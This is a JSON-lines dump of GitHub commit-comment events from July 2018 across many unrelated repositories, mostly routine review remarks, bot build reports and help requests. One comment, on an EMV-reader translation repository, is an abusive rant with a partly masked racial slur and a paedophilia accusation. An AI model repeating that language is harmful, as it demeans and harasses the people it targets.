{"id":"7930442028","type":"CommitCommentEvent","actor":{"login":"mwarning"},"repo":{"name":"dakhnod/Meshenger"},"payload":{"comment":{"id":29625125,"position":177,"line":364,"path":"app/src/main/java/d/d/meshenger/MainService.java","commit_id":"e96867ec3f26475b7ce3f5121d006d143506ae10","created_at":"2018-07-06T18:52:07Z","updated_at":"2018-07-06T18:52:07Z","author_association":"NONE","body":"Verursacht das continue loop nicht hier eine Endlosschleife?"}},"created_at":"2018-07-06T18:52:07Z"}
{"id":"7930443023","type":"CommitCommentEvent","actor":{"login":"stelladrop"},"repo":{"name":"devnied/EMV-Reader-translation"},"payload":{"comment":{"id":29625128,"position":null,"line":null,"path":null,"commit_id":"d69b0d9fc61555fd75952d1ed7598fe234cf61a4","created_at":"2018-07-06T18:52:21Z","updated_at":"2018-07-06T18:52:21Z","author_association":"NONE","body":"You are some dumb fucken n****** it just proved that you guys were all up in my shit stealing my shit Dum ass STELLA  JUST DROP THIS  Delivery remind you write solos from phedophile so no US got him ha losers"}},"created_at":"2018-07-06T18:52:21Z"}
{"id":"7930453603","type":"CommitCommentEvent","actor":{"login":"bgrainger"},"repo":{"name":"mysql-net/MySqlConnector"},"payload":{"comment":{"id":29625160,"position":null,"line":null,"path":null,"commit_id":"4d43f0673159570bfa05ef5f77c7518910346d92","created_at":"2018-07-06T18:55:05Z","updated_at":"2018-07-06T18:55:05Z","author_association":"MEMBER","body":"Fixes #528."}},"created_at":"2018-07-06T18:55:05Z"}
{"id":"7930453782","type":"CommitCommentEvent","actor":{"login":"johnbocaligsage"},"repo":{"name":"sagetreesd/gonavis-franchising"},"payload":{"comment":{"id":29625162,"position":null,"line":null,"path":null,"commit_id":"3f5e039909988bf795dbbda7545b7380c9549dda","created_at":"2018-07-06T18:55:08Z","updated_at":"2018-07-06T18:55:08Z","author_association":"COLLABORATOR","body":"Created multidev environment [gonavis-franchising#ci-113](https://dashboard.pantheon.io/sites/bd2040d9-444e-4c2e-ad13-fd575701973a#ci-113).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-113-gonavis-franchising.pantheonsite.io/)"}},"created_at":"2018-07-06T18:55:08Z"}
{"id":"7930456834","type":"CommitCommentEvent","actor":{"login":"daivadaiva"},"repo":{"name":"gedasprojektai/front-end-one-"},"payload":{"comment":{"id":29625167,"position":4,"line":12,"path":"Values and Approach Principles.txt","commit_id":"baef57bcbaffaa6d8d54b3bf321c9f058799a914","created_at":"2018-07-06T18:55:54Z","updated_at":"2018-07-06T18:55:54Z","author_association":"COLLABORATOR","body":"Ok!"}},"created_at":"2018-07-06T18:55:54Z"}
{"id":"7930458422","type":"CommitCommentEvent","actor":{"login":"daivadaiva"},"repo":{"name":"gedasprojektai/front-end-one-"},"payload":{"comment":{"id":29625171,"position":5,"line":13,"path":"Values and Approach Principles.txt","commit_id":"baef57bcbaffaa6d8d54b3bf321c9f058799a914","created_at":"2018-07-06T18:56:19Z","updated_at":"2018-07-06T18:56:19Z","author_association":"COLLABORATOR","body":"Ok!"}},"created_at":"2018-07-06T18:56:19Z"}
{"id":"7930460407","type":"CommitCommentEvent","actor":{"login":"daivadaiva"},"repo":{"name":"gedasprojektai/front-end-one-"},"payload":{"comment":{"id":29625178,"position":5,"line":28,"path":"Values and Approach Principles.txt","commit_id":"4dab89fd5cfe78c1fb49d2f480eda122844b350b","created_at":"2018-07-06T18:56:49Z","updated_at":"2018-07-06T18:56:49Z","author_association":"COLLABORATOR","body":"Yeeesss!"}},"created_at":"2018-07-06T18:56:49Z"}
{"id":"7930461328","type":"CommitCommentEvent","actor":{"login":"ismail-ru-cse-39"},"repo":{"name":"ismail-ru-cse-39/hello-world"},"payload":{"comment":{"id":29625182,"position":null,"line":null,"path":null,"commit_id":"06e849e9caa83dfd1f93a2012bc87e1c707b813b","created_at":"2018-07-06T18:57:03Z","updated_at":"2018-07-06T18:57:03Z","author_association":"OWNER","body":"or 1010101........."}},"created_at":"2018-07-06T18:57:03Z"}
{"id":"7930480049","type":"CommitCommentEvent","actor":{"login":"Wphelp98737"},"repo":{"name":"unreal4u/telegram-api"},"payload":{"comment":{"id":29625240,"position":8,"line":8,"path":"src/Telegram/Types/StickerSet.php","commit_id":"f47acd186d03b4aab59691305b0c35e49de3213f","created_at":"2018-07-06T19:01:32Z","updated_at":"2018-07-06T19:01:32Z","author_association":"NONE","body":"لغو  اظهار نظر…\r\n+ استفاده از  unreal4u \\ TelegramAPI \\ Telegram \\ Types \\ Custom \\ StickerSetArray ؛"}},"created_at":"2018-07-06T19:01:32Z"}
{"id":"7930480327","type":"CommitCommentEvent","actor":{"login":"ticky"},"repo":{"name":"renovatebot/renovate"},"payload":{"comment":{"id":29625243,"position":null,"line":null,"path":null,"commit_id":"569037469d772e4a4f95076d6274f92c795eea62","created_at":"2018-07-06T19:01:37Z","updated_at":"2018-07-06T19:01:37Z","author_association":"NONE","body":"Oh, awesome! This is great 😃"}},"created_at":"2018-07-06T19:01:37Z"}
{"id":"7930482201","type":"CommitCommentEvent","actor":{"login":"santoshmagar1922"},"repo":{"name":"santoshmagar1922/CreditCardGen"},"payload":{"comment":{"id":29625249,"position":null,"line":null,"path":null,"commit_id":"27a3337017160bfed3cb1c9353d4e06fec2faa36","created_at":"2018-07-06T19:02:06Z","updated_at":"2018-07-06T19:02:06Z","author_association":"OWNER","body":"Section 1\r\n\tName: Santosh Magar\r\n\tYears of Experience: 9 years 10 months\r\n\r\nSection 2: \r\n\tBuild IDE: Spring Tool Suite (STS) Java EE IDE (Version: 3.6)\r\n\tJDK Version: java version \"1.8.0_111\"\r\n\r\nSection 3 \r\na)\tSonar lint / EclEmma scan Snapshot \r\nb)\tFinal Output Snapshot \r\nc)\tJunit Coverage Snapshot\r\n\r\nSection 4 \r\nLicensing \r\n"}},"created_at":"2018-07-06T19:02:06Z"}
{"id":"7930482638","type":"CommitCommentEvent","actor":{"login":"santoshmagar1922"},"repo":{"name":"santoshmagar1922/CreditCardGen"},"payload":{"comment":{"id":29625252,"position":null,"line":null,"path":null,"commit_id":"27a3337017160bfed3cb1c9353d4e06fec2faa36","created_at":"2018-07-06T19:02:13Z","updated_at":"2018-07-06T19:02:13Z","author_association":"OWNER","body":"first commit"}},"created_at":"2018-07-06T19:02:13Z"}
{"id":"7930484352","type":"CommitCommentEvent","actor":{"login":"farhany"},"repo":{"name":"farhany/simple_opencv_pi_face_detector"},"payload":{"comment":{"id":29625259,"position":null,"line":null,"path":null,"commit_id":"667e8924ab6608dee5f4f05c0a094c7edbf84680","created_at":"2018-07-06T19:02:40Z","updated_at":"2018-07-06T19:02:40Z","author_association":"OWNER","body":"Thanks for the pull. And keep on doing your YouTube channel."}},"created_at":"2018-07-06T19:02:40Z"}
{"id":"7930496382","type":"CommitCommentEvent","actor":{"login":"shreyanshk"},"repo":{"name":"shreyanshk/boottorrent"},"payload":{"comment":{"id":29625292,"position":63,"line":63,"path":"GSoC-2018/boottorrent-LTSP-comparison.org","commit_id":"e9bd57d350ee721b1982d57dacaaca794296e7ae","created_at":"2018-07-06T19:05:37Z","updated_at":"2018-07-06T19:05:37Z","author_association":"OWNER","body":"I'd add that it is possible to use Docker as well to build the images on the host without any virtualization.\r\nThe process (in short) would look like this:\r\n1. Script appends/updates ``distro-packages.list`` and ``tazlito.conf`` file as required.\r\n2. Updated files are copied to SliTaz's docker image.\r\n3. Image is then build inside the docker image.\r\n4. Export the built files (``bzImage`` & ``rootfs.gz``) to host with ``docker cp``.\r\n\r\nBuilding with Docker is doable."}},"created_at":"2018-07-06T19:05:37Z"}
{"id":"7930498017","type":"CommitCommentEvent","actor":{"login":"adixon"},"repo":{"name":"civicrm/civicrm-core"},"payload":{"comment":{"id":29625296,"position":null,"line":null,"path":null,"commit_id":"f61437d3e85c5458b06403a5118ab9f04ac7a1dc","created_at":"2018-07-06T19:06:03Z","updated_at":"2018-07-06T19:06:03Z","author_association":"CONTRIBUTOR","body":"See https://lab.civicrm.org/dev/core/issues/240 for followup.\r\n\r\nShort version - this patch requires any page that loads the paymentBlock.tpl to have the currency value assigned. The paymentBlock seems to get included usually via the BillingBlockWrapper which is included from about ten other templates.\r\n\r\nIt's probably failing in a few of those places but most of the time the absence of the currency value in the payment form isn't important. It's a bit tricky to figure out where to put in logging code - optimally just before the paymentBlock.tpl gets evaluated, but I don't know how to do that."}},"created_at":"2018-07-06T19:06:03Z"}
{"id":"7930503417","type":"CommitCommentEvent","actor":{"login":"broeker"},"repo":{"name":"electriccitizen/lawhelp"},"payload":{"comment":{"id":29625307,"position":null,"line":null,"path":null,"commit_id":"d632083bd168b199e2b293b2c743fb41ab93d918","created_at":"2018-07-06T19:07:35Z","updated_at":"2018-07-06T19:07:35Z","author_association":"CONTRIBUTOR","body":"Created multidev environment [lawhelp#pr-af-loons](https://dashboard.pantheon.io/sites/9ec12d94-c804-44b7-968e-166a0b49fdc0#pr-af-loons).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://pr-af-loons-lawhelp.pantheonsite.io/)"}},"created_at":"2018-07-06T19:07:35Z"}
{"id":"7930503845","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"drewyh/EnergyPlus"},"payload":{"comment":{"id":29625308,"position":null,"line":null,"path":null,"commit_id":"e842f9580efe872b8e79a0e19fec5a3e1e253a7a","created_at":"2018-07-06T19:07:42Z","updated_at":"2018-07-06T19:07:42Z","author_association":"NONE","body":"oo_boiler_refactor (drewyh) - Win64-Windows-7-VisualStudio-14: OK (2801 of 2930 tests passed, 45 test warnings)\n\nMessages:\n\n * 15 tests had: AUD diffs.\n * 103 tests had: EIO diffs.\n * 112 tests had: ESO small diffs.\n * 3 tests had: Table small diffs.\n * 157 tests had: BND diffs.\n * 8 tests had: ESO big diffs.\n * 127 tests had: Table big diffs.\n * 151 tests had: MDD diffs.\n * 158 tests had: MTD diffs.\n * 151 tests had: RDD diffs.\n * 100 tests had: MTR small diffs.\n * 3 tests had: MTR big diffs.\n * 4 tests had: ERR diffs.\n * 1 test had: SSZ big diffs.\n * 1 test had: ZSZ big diffs.\n\nFailures:\n\n\nregression Test Summary\n * Passed: 494\n * Failed: 129\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-e842f9580efe872b8e79a0e19fec5a3e1e253a7a-PR6728-Win64-Windows-7-VisualStudio-14.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-e842f9580efe872b8e79a0e19fec5a3e1e253a7a-PR6728-Win64-Windows-7-VisualStudio-14.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-95.6%25-yellow.png)</a> \n"}},"created_at":"2018-07-06T19:07:42Z"}
{"id":"7930507536","type":"CommitCommentEvent","actor":{"login":"meischdaddy30"},"repo":{"name":"Kitt-AI/snowboy"},"payload":{"comment":{"id":29625314,"position":null,"line":null,"path":null,"commit_id":"797a17e96fc085dbd70a6fefeb15b9bc43f52913","created_at":"2018-07-06T19:08:40Z","updated_at":"2018-07-06T19:08:40Z","author_association":"NONE","body":"Could someone let me know how to set the ApplyFrontend to true please?  This is the only thing I haven't done seeing how I'm not sure where to edit this"}},"created_at":"2018-07-06T19:08:40Z"}
{"id":"7930512206","type":"CommitCommentEvent","actor":{"login":"Wphelp98737"},"repo":{"name":"munin-monitoring/munin"},"payload":{"comment":{"id":29625321,"position":1,"line":1,"path":".dir-locals.el","commit_id":"1b6f2b3c3ad0816d1ebaca5e78fa23517488fb4d","created_at":"2018-07-06T19:09:55Z","updated_at":"2018-07-06T19:09:55Z","author_association":"NONE","body":" (( صفر  . (( تورفتگی زبانه حالت  .  تی )\r\n"}},"created_at":"2018-07-06T19:09:55Z"}
{"id":"7930512667","type":"CommitCommentEvent","actor":{"login":"cpalmquist19"},"repo":{"name":"cpalmquist19/UdemyCPlusPlus"},"payload":{"comment":{"id":29625322,"position":null,"line":null,"path":null,"commit_id":"87a3ed3b4fb85f38f35aa973a91c60bbc9726f2a","created_at":"2018-07-06T19:10:03Z","updated_at":"2018-07-06T19:10:03Z","author_association":"OWNER","body":"So, what I should have done on line 17 is:\r\nstd::cout << \"No, really!!, \" << favNum << \" is my favorite number!\" << std:end; << std::endl;\r\n\r\nThe answer I was looking for I was already doing with the new lines, doh."}},"created_at":"2018-07-06T19:10:03Z"}
{"id":"7930514937","type":"CommitCommentEvent","actor":{"login":"rbuels"},"repo":{"name":"GMOD/jbrowse"},"payload":{"comment":{"id":29625324,"position":null,"line":null,"path":null,"commit_id":"ba7c6821db242c9ac4ab6572ff5e52e8189cd518","created_at":"2018-07-06T19:10:38Z","updated_at":"2018-07-06T19:10:38Z","author_association":"COLLABORATOR","body":"For some reason, it doesn't work when the file that changes is importing an\nexternal npm module with cjsRequire.\n\nOn Fri, Jul 6, 2018 at 5:57 AM Colin Diesh <notifications@github.com> wrote:\n\n> Maybe I can just run npx webpack -w I suppose for my own workflow\n>\n> —\n> You are receiving this because you authored the thread.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/GMOD/jbrowse/commit/ba7c6821db242c9ac4ab6572ff5e52e8189cd518#commitcomment-29621052>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AAEgFVnizMvGfnzTmAibGdKDrxhpsOsGks5uD166gaJpZM4VFae0>\n> .\n>\n"}},"created_at":"2018-07-06T19:10:38Z"}
{"id":"7930516677","type":"CommitCommentEvent","actor":{"login":"Zepeda244"},"repo":{"name":"Zepeda244/Git-sublime"},"payload":{"comment":{"id":29625330,"position":null,"line":null,"path":null,"commit_id":"fde9a120ccddeca82657219c0da8cef19505b8a7","created_at":"2018-07-06T19:11:08Z","updated_at":"2018-07-06T19:11:08Z","author_association":"OWNER","body":"cotejado"}},"created_at":"2018-07-06T19:11:08Z"}
{"id":"7930517753","type":"CommitCommentEvent","actor":{"login":"charbelsako"},"repo":{"name":"charbelsako/pacman"},"payload":{"comment":{"id":29625331,"position":null,"line":null,"path":null,"commit_id":"714c5f7f1ecc8eef72dba2bf4cd46fd17022ec52","created_at":"2018-07-06T19:11:26Z","updated_at":"2018-07-06T19:11:26Z","author_association":"OWNER","body":"Previously on this repository the idea of having many \"pacmen\" was impossible. Yet I was able to sort of cheat my way into making it. All that's left is choosing the best \"pacman\" mutating it and making a new population. I would also like to add some way such that i can speed up the game"}},"created_at":"2018-07-06T19:11:26Z"}
{"id":"7930519077","type":"CommitCommentEvent","actor":{"login":"genfhk"},"repo":{"name":"NYPL/ami-metadata"},"payload":{"comment":{"id":29625334,"position":null,"line":null,"path":null,"commit_id":"40580d4ce449ab5e48c81d75093ff928ad3e3683","created_at":"2018-07-06T19:11:48Z","updated_at":"2018-07-06T19:11:48Z","author_association":"COLLABORATOR","body":"ohhhh..."}},"created_at":"2018-07-06T19:11:48Z"}
{"id":"7930522512","type":"CommitCommentEvent","actor":{"login":"mabrowning"},"repo":{"name":"dji-sdk/Onboard-SDK"},"payload":{"comment":{"id":29625341,"position":null,"line":null,"path":null,"commit_id":"bb0bd75516497813251a67d0289e42b5948a8f6a","created_at":"2018-07-06T19:12:43Z","updated_at":"2018-07-06T19:12:43Z","author_association":"NONE","body":"Where is the arm7l M210ConfigTool? If you are going to have a closed source binary blob, please commit to supporting these platforms...."}},"created_at":"2018-07-06T19:12:43Z"}
{"id":"7930530935","type":"CommitCommentEvent","actor":{"login":"JacquesCarette"},"repo":{"name":"JacquesCarette/Drasil"},"payload":{"comment":{"id":29625364,"position":null,"line":null,"path":null,"commit_id":"ee67177ebcb5a3d41ff69a1308c7cd046a5a5eb2","created_at":"2018-07-06T19:15:05Z","updated_at":"2018-07-06T19:15:05Z","author_association":"OWNER","body":"I did mention previously that `ExprExtract` and `SentenceExtract` are not good module names. Do these actually still exist?"}},"created_at":"2018-07-06T19:15:05Z"}
{"id":"7930532489","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29625368,"position":null,"line":null,"path":null,"commit_id":"b48f169a40bd467619304a3ef564a421435aa852","created_at":"2018-07-06T19:15:31Z","updated_at":"2018-07-06T19:15:31Z","author_association":"NONE","body":"#6598-FanSystemModel-crashes-using-Continuous-speed-control-method (rraustad) - x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug: OK (1685 of 1685 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-b48f169a40bd467619304a3ef564a421435aa852-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-b48f169a40bd467619304a3ef564a421435aa852-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-b48f169a40bd467619304a3ef564a421435aa852-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Coverage Badge](http://img.shields.io/badge/coverage%20status-40.18%25-green.png)</a>\n"}},"created_at":"2018-07-06T19:15:31Z"}
{"id":"7930542787","type":"CommitCommentEvent","actor":{"login":"Edk13"},"repo":{"name":"liangchen95/novel"},"payload":{"comment":{"id":29625377,"position":null,"line":null,"path":null,"commit_id":"8db0e67e2a2b49b67e383dca33d18738bdf850f2","created_at":"2018-07-06T19:18:19Z","updated_at":"2018-07-06T19:18:19Z","author_association":"NONE","body":"居然在Github上找到了彩蛇gay！简直奇迹"}},"created_at":"2018-07-06T19:18:19Z"}
{"id":"7930546478","type":"CommitCommentEvent","actor":{"login":"conda-forge-linter"},"repo":{"name":"conda-forge/trafaret-feedstock"},"payload":{"comment":{"id":29625379,"position":null,"line":null,"path":null,"commit_id":"0eaa3994a6620bc2a4988526e1dae3ea310d8788","created_at":"2018-07-06T19:19:17Z","updated_at":"2018-07-06T19:19:17Z","author_association":"NONE","body":"\nHi! This is the friendly automated conda-forge-webservice.\n\nI updated the Github team because of this commit.\n\n- @deepwalker were added to conda-forge. Welcome to conda-forge!\"\n  Go to https://github.com/orgs/conda-forge/invitation see your invitation.\n\n- @deepwalker were added to this feedstock maintenance team.\n  You should get push access to this feedstock and CI services.\n\nFeel free to join the community [chat room](https://gitter.im/conda-forge/conda-forge.github.io).\n\nNOTE: Please make sure to not push to the repository directly.\n      Use branches in your fork for any changes and send a PR.\n      More details [here](https://conda-forge.org/docs/conda-forge_gotchas.html#using-a-fork-vs-a-branch-when-updating-a-recipe)\n"}},"created_at":"2018-07-06T19:19:17Z"}
{"id":"7930549863","type":"CommitCommentEvent","actor":{"login":"shreyanshk"},"repo":{"name":"shreyanshk/boottorrent"},"payload":{"comment":{"id":29625384,"position":110,"line":110,"path":"GSoC-2018/boottorrent-LTSP-comparison.org","commit_id":"e9bd57d350ee721b1982d57dacaaca794296e7ae","created_at":"2018-07-06T19:20:13Z","updated_at":"2018-07-06T19:20:13Z","author_association":"OWNER","body":"How does one configure the NBD/NFS disk on LTSP?"}},"created_at":"2018-07-06T19:20:13Z"}
{"id":"7930552871","type":"CommitCommentEvent","actor":{"login":"saeeprakash"},"repo":{"name":"refactoror/SelBlocks"},"payload":{"comment":{"id":29625391,"position":null,"line":null,"path":null,"commit_id":"69c10011349b935f42a5f58871cc9b0b62b8497b","created_at":"2018-07-06T19:21:05Z","updated_at":"2018-07-06T19:21:05Z","author_association":"NONE","body":"Hi, I am new to Selenium,\r\nI was writing the below Code:\r\nfor i=1;i<=5;i++\r\nclick xpath=(//input[@id='radio_9'])[3]\r\nclick id=submit\r\npause 10000\r\nendFor\r\n\r\nbut getting the below error in IDE at endFor Statement.\r\n\r\n[error] There was an unexpected Alert! [Score Succesfully Updated ]\r\n\r\nPlease help in clearing/ handling this error.\r\n\r\n"}},"created_at":"2018-07-06T19:21:05Z"}
{"id":"7930553194","type":"CommitCommentEvent","actor":{"login":"tfox80"},"repo":{"name":"tfox80/help"},"payload":{"comment":{"id":29625392,"position":null,"line":null,"path":null,"commit_id":"14d163b261c0cb8578bd69e9510a7fe4b23ed378","created_at":"2018-07-06T19:21:11Z","updated_at":"2018-07-06T19:21:11Z","author_association":"OWNER","body":"I noticed that red light on nes mini comes on about half way through flash custom kernel. but everything seems fine it finishes and then prompts \"now you can add games\". when I go to add games ive unplugged nes and plug in after prompt displays plug in and turn on. which I do, the pc chimes, light on nes is on then process meter starts moving , another chime and light on nes goes out then an error message pops up. ive tried 3 new nes systems with similar results (they get \"bricked\"). my older nes mini still works fine, ive added a few games to it after the 3 that ive had issues with. am I doing something wrong with the newer ones?"}},"created_at":"2018-07-06T19:21:11Z"}
{"id":"7930556169","type":"CommitCommentEvent","actor":{"login":"superm1"},"repo":{"name":"hughsie/lvfs-website"},"payload":{"comment":{"id":29625397,"position":null,"line":null,"path":null,"commit_id":"a6483c3f84483e63fbfd0de94f1c63768186aabb","created_at":"2018-07-06T19:21:59Z","updated_at":"2018-07-06T19:21:59Z","author_association":"COLLABORATOR","body":"👍 "}},"created_at":"2018-07-06T19:21:59Z"}
{"id":"7930558219","type":"CommitCommentEvent","actor":{"login":"Eysz7words"},"repo":{"name":"Eysz7words/AppCenter"},"payload":{"comment":{"id":29625405,"position":null,"line":null,"path":null,"commit_id":"af21a6b310c7198f78b1c4ac0e23371ae1a3add6","created_at":"2018-07-06T19:22:32Z","updated_at":"2018-07-06T19:22:32Z","author_association":"OWNER","body":"\r\n\r\n@octocat :+1: This PR looks great - it's ready to merge! :shipit:\r\n\r\n"}},"created_at":"2018-07-06T19:22:32Z"}
{"id":"7930583265","type":"CommitCommentEvent","actor":{"login":"knuxfanwin8"},"repo":{"name":"knuxfanwin8/pinghost-site"},"payload":{"comment":{"id":29625452,"position":null,"line":null,"path":null,"commit_id":"15d793c614efca07cea2654a0af5810240309588","created_at":"2018-07-06T19:29:29Z","updated_at":"2018-07-06T19:29:29Z","author_association":"OWNER","body":"Whoops, submitted while typing the commit :P \r\nMake the site point to making a new issue.\r\nTotally didn't rip off auroracommunity.io\r\n"}},"created_at":"2018-07-06T19:29:29Z"}
{"id":"7930584451","type":"CommitCommentEvent","actor":{"login":"kccqzy"},"repo":{"name":"capital-match/bytestring-trie"},"payload":{"comment":{"id":29625453,"position":11,"line":8,"path":"bytestring-trie.cabal","commit_id":"47526b2ec810239fe824c03c13cf1d81f0741b5c","created_at":"2018-07-06T19:29:48Z","updated_at":"2018-07-06T19:29:48Z","author_association":"NONE","body":"👍\r\nSo you aren't maintaining this?"}},"created_at":"2018-07-06T19:29:48Z"}
{"id":"7930584956","type":"CommitCommentEvent","actor":{"login":"Kurinjs"},"repo":{"name":"Kurinjs/Test"},"payload":{"comment":{"id":29625456,"position":16,"line":14,"path":"README.md","commit_id":"babc0a39e9dc3b71f91151acc3f1e032681df89e","created_at":"2018-07-06T19:29:56Z","updated_at":"2018-07-06T19:29:56Z","author_association":"OWNER","body":"вф\r\n"}},"created_at":"2018-07-06T19:29:56Z"}
{"id":"7930587366","type":"CommitCommentEvent","actor":{"login":"joaoamsantos"},"repo":{"name":"joaoamsantos/AppMayoristas"},"payload":{"comment":{"id":29625466,"position":null,"line":null,"path":null,"commit_id":"59d5e64d69f93ce3e6fee6f7b0ec229fbbd5a9a2","created_at":"2018-07-06T19:30:32Z","updated_at":"2018-07-06T19:30:32Z","author_association":"OWNER","body":"Good"}},"created_at":"2018-07-06T19:30:32Z"}
{"id":"7930593096","type":"CommitCommentEvent","actor":{"login":"BarbzYHOOL"},"repo":{"name":"azerothcore/azerothcore-wotlk"},"payload":{"comment":{"id":29625479,"position":null,"line":null,"path":null,"commit_id":"2c7485c11c4e62479a61d3b2e28fd84677e2fe40","created_at":"2018-07-06T19:32:06Z","updated_at":"2018-07-06T19:32:06Z","author_association":"MEMBER","body":"plez :'("}},"created_at":"2018-07-06T19:32:06Z"}
{"id":"7930610828","type":"CommitCommentEvent","actor":{"login":"cmdcolin"},"repo":{"name":"GMOD/jbrowse"},"payload":{"comment":{"id":29625533,"position":null,"line":null,"path":null,"commit_id":"ba7c6821db242c9ac4ab6572ff5e52e8189cd518","created_at":"2018-07-06T19:37:12Z","updated_at":"2018-07-06T19:37:12Z","author_association":"CONTRIBUTOR","body":"Ya same with the \"import\" I think for example on GFF3Tabix. I guess since the minority of files have these imports I still like the normal webpack watch "}},"created_at":"2018-07-06T19:37:12Z"}
{"id":"7930617465","type":"CommitCommentEvent","actor":{"login":"JZ6"},"repo":{"name":"FarhadG/init"},"payload":{"comment":{"id":29625551,"position":null,"line":null,"path":null,"commit_id":"68c8dd63e23991fc8c7c3950ee3698aa0e100742","created_at":"2018-07-06T19:39:06Z","updated_at":"2018-07-06T19:39:06Z","author_association":"NONE","body":"Nice"}},"created_at":"2018-07-06T19:39:06Z"}
{"id":"7930619433","type":"CommitCommentEvent","actor":{"login":"ramanamuttana"},"repo":{"name":"ramanamuttana/Java-Programmes"},"payload":{"comment":{"id":29625561,"position":17,"line":14,"path":"Ramana/practiced programmes/src/Decisionlopps/Forloop.java","commit_id":"164c6cfc7e96c6a416539f0b2c7cb0d7dd997fad","created_at":"2018-07-06T19:39:38Z","updated_at":"2018-07-06T19:39:38Z","author_association":"OWNER","body":"no need "}},"created_at":"2018-07-06T19:39:38Z"}
{"id":"7930621949","type":"CommitCommentEvent","actor":{"login":"yeltnar"},"repo":{"name":"yeltnar/ws-expose-server"},"payload":{"comment":{"id":29625569,"position":null,"line":null,"path":null,"commit_id":"77d810110d477c709bf4e7a32881127f9a22b6ba","created_at":"2018-07-06T19:40:18Z","updated_at":"2018-07-06T19:40:18Z","author_association":"OWNER","body":"IBM Cloud [toolchain](https://console.ng.bluemix.net/devops/toolchains/8839f9f8-ee5d-429f-8749-52267c653952?env_id=ibm%3Ayp%3Aus-south \"ws-expose\"): [Delivery Pipeline](https://console.ng.bluemix.net/devops/pipelines/5c41e84d-5968-4649-8c7b-52afb41b0a6e?env_id=ibm%3Ayp%3Aus-south \"ws-expose-pipeline\") deployed [ws-expose-server](https://github.com/yeltnar/ws-expose-server/releases/tag/deploy-ibm-yp-us-south-andcbrant-gmail.com-dev-20180706-194017 \"deploy-ibm-yp-us-south-andcbrant-gmail.com-dev-20180706-194017\") to [dev](https://console.bluemix.net/apps/e68f5516-a561-42c7-ac49-af54fea27ed3?env_id=ibm:yp:us-south \"ibm:yp:us-south:andcbrant@gmail.com:dev\"), including this commit"}},"created_at":"2018-07-06T19:40:18Z"}
{"id":"7930631193","type":"CommitCommentEvent","actor":{"login":"zunaalabaya"},"repo":{"name":"zunaalabaya/giginya-yang-berbulu"},"payload":{"comment":{"id":29625583,"position":2,"line":2,"path":".gitignore","commit_id":"2005797475d35b1aff4015fa2bba2031c3b3239f","created_at":"2018-07-06T19:42:53Z","updated_at":"2018-07-06T19:42:53Z","author_association":"OWNER","body":"+{\"status\":\"1\",\"message\":\"OK\",\"result\":\"21265524714464\"}"}},"created_at":"2018-07-06T19:42:53Z"}
{"id":"7930634046","type":"CommitCommentEvent","actor":{"login":"zunaalabaya"},"repo":{"name":"zunaalabaya/giginya-yang-berbulu"},"payload":{"comment":{"id":29625587,"position":6,"line":5,"path":".gitignore","commit_id":"2005797475d35b1aff4015fa2bba2031c3b3239f","created_at":"2018-07-06T19:43:40Z","updated_at":"2018-07-06T19:43:40Z","author_association":"OWNER","body":"+{\"status\":\"1\",\"message\":\"OK\",\"result\":\"21265524714464\"}"}},"created_at":"2018-07-06T19:43:40Z"}
{"id":"7930636541","type":"CommitCommentEvent","actor":{"login":"zunaalabaya"},"repo":{"name":"zunaalabaya/giginya-yang-berbulu"},"payload":{"comment":{"id":29625591,"position":6,"line":5,"path":".gitignore","commit_id":"2005797475d35b1aff4015fa2bba2031c3b3239f","created_at":"2018-07-06T19:44:22Z","updated_at":"2018-07-06T19:44:22Z","author_association":"OWNER","body":"+{\"status\":\"1\",\"message\":\"OK\",\"result\":\"21265524714464\"}\r\n"}},"created_at":"2018-07-06T19:44:22Z"}
{"id":"7930641846","type":"CommitCommentEvent","actor":{"login":"Shalom04"},"repo":{"name":"autotest/autotest"},"payload":{"comment":{"id":29625607,"position":null,"line":null,"path":null,"commit_id":"816c4ded25a4cc41bbf6eabd27786730f9e44510","created_at":"2018-07-06T19:45:49Z","updated_at":"2018-07-06T19:45:49Z","author_association":"NONE","body":"I am facing \"packages.checksum\" issue still, please help me on this. \r\nBelow is my log \r\n\r\nhttps://user-images.githubusercontent.com/40900038/42397236-b575280a-8182-11e8-8d61-5ee5fab4678b.png\r\n\r\n"}},"created_at":"2018-07-06T19:45:49Z"}
{"id":"7930642459","type":"CommitCommentEvent","actor":{"login":"idodin"},"repo":{"name":"idoneam/Canary"},"payload":{"comment":{"id":29625608,"position":null,"line":null,"path":null,"commit_id":"5da51912d5eb466a1c37d2e402f89350fd5f5103","created_at":"2018-07-06T19:45:59Z","updated_at":"2018-07-06T19:45:59Z","author_association":"MEMBER","body":"It might be better if we use a configuration file for the Welcome and Goodbye Messages instead of an sqlite3 db? We could also add the database path to that. (+any future 'customizable' options). "}},"created_at":"2018-07-06T19:45:59Z"}
